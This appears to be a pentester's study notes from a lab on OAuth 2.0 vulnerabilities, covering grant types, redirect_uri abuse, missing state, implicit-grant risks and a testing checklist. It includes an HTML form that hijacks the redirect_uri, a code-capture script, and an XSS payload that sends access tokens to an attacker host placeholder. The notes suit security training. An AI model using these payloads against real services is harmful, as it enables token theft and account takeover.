OAuth Vulnerabilities | Alban Beluli

Overview

OAuth 2.0 is widely used to let one application access resources on behalf of a user without sharing the user’s credentials directly. These notes cover the core OAuth roles, the major grant types, how the authorization flow works, how to identify OAuth in a target, and the most important implementation flaws that lead to token theft, account linking attacks, and privilege abuse.

Core OAuth Concepts

Understanding OAuth starts with understanding the roles involved in the trust relationship.

Resource owner: the user or system that owns the protected data.
Client: the app requesting access on the user’s behalf.
Authorization server: authenticates the user and issues tokens.
Resource server: hosts the protected data and validates tokens.
Authorization grant: the artifact used to obtain an access token.
Access token: the credential used to access protected resources.
Refresh token: used to obtain a new access token without full re-authentication.
Redirect URI: the location where the authorization server sends the user after authorization.
Scope: the set of permissions being requested.
State parameter: a CSRF defense that links the response to the original request.

OAuth 2.0 Grant Types

Authorization Code Grant

The most common server-side flow. The client receives a temporary authorization code and exchanges it server-to-server for an access token. This reduces token exposure and supports refresh tokens.

Implicit Grant

Designed for public clients such as browser-based apps. The access token is returned directly to the user agent, usually in the URL fragment. This flow is faster but significantly less secure and is now being phased out in modern guidance.

Resource Owner Password Credentials Grant

The client collects the user's credentials directly and exchanges them for a token. This only makes sense for highly trusted first-party apps and is unsuitable for third-party integrations.

Client Credentials Grant

Used for server-to-server communication where no user is involved. The client authenticates with its own credentials and receives an access token directly.

OAuth Authorization Code Flow

The standard authorization code flow works in several steps:

The client redirects the user to the authorization endpoint.
The user authenticates with the provider and grants consent.
The provider redirects the user back with an authorization code.
The client exchanges that code at the token endpoint.
The authorization server returns an access token and optionally a refresh token.
The client uses the access token to query the resource server.

Security idea: the authorization code is only a temporary artifact. The real access token is meant to be obtained through a more controlled backend exchange.

How to Identify OAuth in an Application

OAuth is often visible from the login flow long before source code is available. Look for “Login with Google”, “Login with GitHub”, or other third-party identity options. Network traffic usually confirms it.

Look for redirects to external authorization endpoints.
Inspect query parameters such as response_type, client_id, redirect_uri, scope, and state.
Identify framework clues in endpoint patterns, headers, error messages, or source imports.
Map both the authorization endpoint and token endpoint behavior.

Redirect URI Abuse

The redirect_uri tells the authorization server where to send the authorization response. If the provider accepts a URI the attacker controls, the authorization code or token can be delivered to the wrong place.

This is especially dangerous when developers over-register domains, trust dev or staging subdomains too broadly, or fail to validate the redirect target strictly.

<form action="http://coffee.thm:8000/oauthdemo/oauth_login/" method="get">
    <input type="hidden" name="redirect_uri" value="http://dev.bistro.thm:8002/malicious_redirect.html">
    <input type="submit" value="Hijack OAuth">
</form>

<script>
const urlParams = new URLSearchParams(window.location.search);
const code = urlParams.get('code');
document.getElementById('auth_code').innerText = code;
console.log("Intercepted Authorization Code:", code);
</script>

Once the attacker gets the authorization code, they can usually replay it against the legitimate callback endpoint and exchange it for an access token.

Weak or Missing State Parameter

The state parameter binds the authorization response to the request that started it. If it is missing, static, or predictable, the client can become vulnerable to CSRF-style OAuth abuse.

That usually lets the attacker cause the victim’s browser to complete an OAuth flow that attaches the attacker’s authorization or tokens to the victim’s session context.

Typical impact: account linking abuse, unwanted account synchronization, or authorization code injection into the victim’s current session.

Implicit Grant Risks

The implicit grant is dangerous because the access token is returned directly to the browser, often inside the URL fragment. Any script running in the page context can read it.

That means an XSS issue, malicious third-party script, or browser compromise can immediately turn into token theft.

var client_id = 'npmL7WDiRoOvjZoGSDiJhU2ViodTdygjW8rdabt7';
var redirect_uri = 'http://factbook.thm:8080/callback.php';
var auth_url = "http://coffee.thm:8000/o/authorize/";
var url = auth_url + "?response_type=token&client_id=" + client_id + "&redirect_uri=" + encodeURIComponent(redirect_uri);
window.location.href = url;

Combined with XSS, token exfiltration becomes trivial.

<script>
var hash = window.location.hash.substr(1);
var result = hash.split('&').reduce(function (res, item) {
    var parts = item.split('=');
    res[parts[0]] = parts[1];
    return res;
}, {});
var accessToken = result.access_token;
var img = new Image();
img.src = 'http://ATTACKBOX_IP:8081/steal_token?token=' + accessToken;
</script>

This is one of the main reasons the implicit flow is now deprecated in current best practice guidance.

Other Common OAuth Weaknesses

Insufficient token expiry: long-lived tokens dramatically increase the impact of token theft.
Replay attacks: captured tokens can be reused if the design lacks nonce or replay controls.
Insecure token storage: storing tokens in local storage or unsafe files exposes them to XSS and local compromise.
No HTTPS enforcement: tokens or codes can be intercepted in transit.
Over-broad scope: the client gets more access than it actually needs.

OAuth 2.1 Improvements

OAuth 2.1 tries to formalize lessons learned from real-world abuse. The biggest security changes are straightforward:

Implicit grant is deprecated.
Authorization code flow with PKCE is preferred for public clients.
state usage is emphasized for CSRF defense.
Redirect URI handling is tightened.
Safer token handling and storage guidance is reinforced.

Testing Approach

When reviewing an OAuth implementation, focus on the full trust chain rather than only the login page.

Map the authorization request and token exchange endpoints.
Check whether redirect_uri is strictly validated.
Verify that state exists, is unpredictable, and is enforced.
Check which grant type is used and whether it is appropriate.
Review token location, token lifetime, and whether tokens are exposed to the browser unnecessarily.
Test whether account-linking and consent flows can be abused cross-user.
Assess scope handling and whether the client gets excessive privileges.

Key Takeaways

OAuth vulnerabilities are often logic and flow issues, not just cryptography problems.
redirect_uri and state are two of the highest-value parameters to test.
Implicit flow is inherently risky because tokens are exposed directly to the browser.
Account linking abuse can be just as damaging as direct token theft.
OAuth 2.1 mostly codifies security lessons that pentesters already see exploited in OAuth 2.0 deployments.